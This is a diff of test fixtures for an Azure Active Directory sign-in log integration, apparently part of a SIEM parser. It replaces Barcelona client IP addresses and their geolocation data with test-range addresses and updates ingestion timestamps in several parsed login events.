"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -140,25 +122,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -172,7 +136,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -222,7 +186,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -234,12 +198,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051480600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970080Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -278,25 +242,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -310,7 +256,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -360,7 +306,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -372,12 +318,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051485200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970086Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -416,25 +362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -448,7 +376,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -498,7 +426,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -510,12 +438,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051488700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970091700Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -554,25 +482,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -586,7 +496,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -636,7 +546,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -648,12 +558,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051491600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970097400Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -692,25 +602,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -724,7 +616,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -774,7 +666,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -786,12 +678,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051494500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970103200Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -830,25 +722,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -862,7 +736,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -912,7 +786,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
